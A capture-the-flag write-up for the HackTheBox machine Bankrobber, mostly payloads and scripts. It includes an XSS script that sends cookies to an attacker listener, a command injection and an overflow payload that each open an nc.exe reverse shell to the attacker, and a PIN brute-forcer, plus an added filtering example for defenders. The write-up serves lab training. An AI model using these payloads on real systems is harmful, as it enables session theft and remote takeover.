HTB Bankrobber Write-up


Bankrobber is a 50-point machine on hackthebox that involves exploiting a cross-site scripting vulnerability to gain access to an admin account, using a command injection to get a user shell and exploiting a simple buffer overflow to become SYSTEM. My walkthrough is available on YouTube:

Notes


XSS-Payloads:

Injected into the vulnerable field (pulls script.js from the attacker's listener):

<script src="http://<ip>:8000/script.js"></script>

script.js, cookie exfiltration:

function addImg(){
    // append an <img> whose URL carries document.cookie to the listener on port 8000
    var img = document.createElement('img');
    img.src = 'http://<ip>:8000/' + document.cookie;
    document.body.appendChild(img);
}
addImg();

script.js, admin request sent from the victim's browser:

// set the admin session cookies, then POST to the backdoor checker
document.cookie = "id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";
var uri = "/admin/backdoorchecker.php";
var xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// command injection: the pipe appends nc.exe, loaded from the attacker's SMB share
xhr.send("cmd=dir|\\\\<ip>\\xshare\\share\\nc.exe <ip> 7000 -e cmd.exe");
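A defender-side illustration added here (not from the write-up or the box): the cmd value the payload above submits is run against a naive prefix-style filter, which it passes, and against a strict allowlist check, which it fails. The prefix filter is an assumption; the notes do not show what backdoorchecker.php actually validates.

```python
import re

# Constructed sample: the cmd value the write-up's XSS payload POSTs to
# /admin/backdoorchecker.php, with the notes' <ip> placeholders kept.
INJECTED = r"dir|\\<ip>\xshare\share\nc.exe <ip> 7000 -e cmd.exe"

# Only this command is expected by the checker; each argument must match the
# pattern (plain paths and switches, no quoting, no redirection).
ALLOWED = {"dir": re.compile(r"[\w.:\\/-]+")}
# Shell metacharacters that chain or redirect commands under cmd.exe.
META = re.compile(r"[|&;<>^`$()\n\r\"']")


def naive_check(cmd: str) -> bool:
    """Hypothetical prefix-only filter: the kind a pipe appended to 'dir'
    walks straight past (the notes do not show the real check)."""
    return cmd.startswith("dir")


def strict_check(cmd: str) -> bool:
    """Reject metacharacters, then require an allowlisted command whose
    arguments each match that command's pattern."""
    if META.search(cmd):
        return False
    parts = cmd.split()
    if not parts:
        return False
    pattern = ALLOWED.get(parts[0].lower())
    if pattern is None:
        return False
    return all(pattern.fullmatch(arg) for arg in parts[1:])


def to_argv(cmd: str):
    """Return an argv list for subprocess.run(argv) (never shell=True),
    or None when the input fails strict_check."""
    return cmd.split() if strict_check(cmd) else None


if __name__ == "__main__":
    for sample in (INJECTED, "dir C:\\Users", "dir & whoami"):
        print(f"{sample!r:60} naive={naive_check(sample)} strict={strict_check(sample)}")
```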

SSF:

https://securesocketfunneling.github.io/ssf/#home

Python-Scripts:

Connect to the internal service on port 910 through the SSF SOCKS proxy:

from pwn import *

# route the pwntools connection through the SOCKS4 proxy exposed by SSF
context.proxy = (socks.SOCKS4, 'localhost', 9090)
p = remote('localhost', 910, level='info')
p.interactive()

Brute-force the four-digit PIN:

from pwn import *

context.proxy = (socks.SOCKS4, 'localhost', 9090)

# covers 0000-0999; raise to 10000 for the full four-digit space
for i in range(1000):
    # fresh connection per attempt; zfill pads to the four-digit format
    p = remote('localhost', 910, level='info')
    p.recvuntil('[$] ')
    pin = str(i).zfill(4)
    p.sendline(pin)
    result = p.recvline()
    # pwntools returns bytes under Python 3, so compare against a bytes literal
    if b"denied" not in result:
        log.success("Found Pin: " + pin)
        break
    p.close()
p.interactive()

Overflow-Payload:

AAAAAAAABBBBBBBCCCCCCCCDDDDDDD\\\\10.10.14.2\xshare\share\nc.exe <ip> 7000 -e cmd.exe
